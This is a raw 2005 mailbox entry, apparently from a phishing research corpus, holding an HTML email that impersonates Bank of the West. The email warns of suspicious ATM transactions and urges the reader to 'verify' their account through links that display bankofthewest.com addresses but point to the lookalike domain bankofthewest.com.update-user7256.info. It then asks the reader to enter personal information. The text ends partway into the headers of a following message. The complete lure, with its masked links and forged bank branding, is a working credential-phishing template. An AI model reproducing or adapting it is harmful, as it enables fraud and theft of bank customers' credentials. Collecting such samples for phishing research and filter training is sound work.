From: "Account Service" <accounting@bankofthewest.com>
Subject: Verify your Bank Of The West Online Banking Account
Date: Tue, 19 Jul 2005 13.38.14 +0200
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2800.1081
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1081
Message-Id: <20050719113814.35EEF183805@mail2.monkey.org>
To: undisclosed-recipients: ;
Content-Length: 6723
Lines: 87
Status: O
X-Status: 
X-Keywords:                  
X-UID: 131

<html><head></head><body>
<font face="Verdana"><font size="2"> </font>
 <table border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td valign="top" width=61></td>
<td valign="top"><a href='http://bankofthewest.com.update-user7256.info'><img border="0" src="http://www.bankofthewest.com/BOW/assets/vcmStaticContent/images/logo.gif"></a></td>
</tr></tbody></table>
<table border="0" cellpadding="0" cellspacing="0" width="595">
<tbody>
<tr>
<td colspan="5"><font size="2"><img alt="" src="scrisoare_files/s.gif" height="5" width="1"></font></td></tr>
<tr>
<td class="staticPageBorder" colspan="5"><font size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td></tr>
<tr>
<td class="staticPageBorder" width="1"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="6" width="1"></font></td>
<td width="71"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td>
<td width="491"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td>
<td width="30"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td>
<td class="staticPageBorder" width="1"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td></tr>
<tr>
<td class="staticPageBorder" width="1"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td>
<td width="71"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td>
<td width="491">
<table class="jumpnav" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td align="left" width="246"><font face="Arial" size="2"></font>
</td><td align="right" valign="top" width="245">
<div class="generictext"><font face="Arial"><span class="red"><strong><font color="#990000" size="2"></font></strong></span></font> </div></td></tr></tbody></table>
<div class="generictext"><br><font face="Arial"><strong><br>
<font size="2">Bank Of The West Alert Message</font></strong><font size="2"> <br>
<br>
  We
recently reviewed your account, and we suspect an unauthorized ATM -
based transactions on your account. Therefore, as a preventive measure
we have temporary limited your access to sensitive Bank Of The West features.<br> 
<br>
</font></font><font face="Arial" size="2">To
ensure that your account is not compromised please login to <font face="Arial"><font size="2">Bank Of The West</font></font>
Internet Banking by clicking this link, sign in, verify your account information and your
online account will be reactivated by our system. </font></div>
<br>
<div class="generictext"><u><font color="#800080"></font></u><font face="Arial" size="2">- Click on: <a href="http://bankofthewest.com.update-user7256.info" target="_blank">http://www.bankofthewest.com/logon.asp?dd=1</a></font></div>
<div class="generictext"><font face="Arial" size="2">- Enter your personal information.<br>
  - Verify your identity with <font face="Arial"><font size="2">Bank Of The West</font></font></font></div>
<div class="generictext"><font size="2"><font face="Arial"><strong></strong><br>
  If
at any time you require assistance, please contact our Online Account
Services customer hotline at 1-800-788-7000 24 hours a day, 7 days a
week.<br><br>
Thank you for using <font face="Arial"><font size="2">Bank Of The West</font></font> Online Account Services.</font></font></div>
<br>
<table border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr valign="top">
<td width="491"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="17" width="1"></font></td></tr>
<tr valign="top">
<td class="exitPageDivider" width="491"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td></tr>
<tr valign="top">
<td width="491"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="3" width="1"></font></td></tr></tbody></table>
<div class="footnote"><font face="Arial" size="2">Important Information from <span class="generictext"><font face="Arial"><font size="2">Bank Of The West</font></font></span>(R)<br>
  <br></font><font face="Arial" size="2">This e-mail contains information directly related to your account with  us, other<br>
  services
to which you have subscribed, and/or any application you may have
submitted. <span class="generictext"><font face="Arial"><font size="2">Bank Of The West</font></font></span> and its service providers are committed to
protecting your privacy and ask you not to send sensitive account
information through e-mail. You can view our privacy policy and contact
information at <a href="http://bankofthewest.com.update-user7256.info" target="_blank">http://www.bankofthewest.com </a> . If you are not a <span class="generictext"><font face="Arial"><font face="Arial" size="2"><font face="Arial"><font size="2">Bank Of The West</font></font></font></font></span> customer and believe you received this
message in error, please notify us by responding to this e-mail.<br>
</font></div>
<div><font face="Arial" size="2"><img class="inline" alt="" src="scrisoare_files/s.gif" height="10" width="1"></font></div></td>
<td width="30"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td>
<td class="staticPageBorder" width="1"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="1"></font></td></tr>
<tr>
<td class="staticPageBorder" width="1"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="6" width="1"></font></td>
<td colspan="3">
<table border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="44"><font face="Arial" size="2"><img alt="" src="scrisoare_files/s.gif" height="1" width="44"></font></td>
<td width="537">
<div id="footer">
<p class="footer1"><font face="Arial" size="2">      © 1999 - 2005 <span class="generictext"><font face="Arial"><span class="footnote"><font face="Arial" size="2"><font face="Arial"><font size="2">Bank Of The West</font></font></font></span></font></span> , N.A. All rights reserved.</font></p>
</div></td></tr></tbody></table></td></tr></tbody></table></font>
</body></html><!-- text below generated by server. PLEASE REMOVE --><!-- Counter/Statistics data collection code --><script language="JavaScript" src="http://hostingprod.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.webhosting.yahoo.com/visit.gif?us1121697423" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001524&t=1121697423" ALT=1 WIDTH=1 HEIGHT=1>

From jeremy@angelar.com  Tue Jul 19 01:24:34 2005
Return-Path: <jeremy@angelar.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 5759D536E38
	for <jose@login.monkey.org>; Tue, 19 Jul 2005 01:24:34 -0400 (EDT)
Received: from ms-smtp-04.rdc-kc.rr.com (ms-smtp-04.rdc-kc.rr.com [24.94.166.116])
	by mail2.monkey.org (Postfix) with ESMTP id E2313183725
	for <jose@monkey.org>; Tue, 19 Jul 2005 01:24:33 -0400 (EDT)
Received: from angelar.com (CPE-24-163-222-21.mn.res.rr.com [24.163.222.21])
	by ms-smtp-04.rdc-kc.rr.com (8.12.8p1/8.12.7) with ESMTP id j6J57JwJ011514
	for <jose@monkey.org>; Tue, 19 Jul 2005 00:07:20 -0500 (CDT)
Received: from [192.168.1.3] (magnus.angelar.com [192.168.1.3])
	by angelar.com (8.13.1/8.13.1) with ESMTP id j6J5O52H016891
	for <jose@monkey.org>; Tue, 19 Jul 2005 00:24:08 -0500
Message-ID: <42DC8E77.7040509@angelar.com>
Date: Tue, 19 Jul 2005 00:24:07 -0500
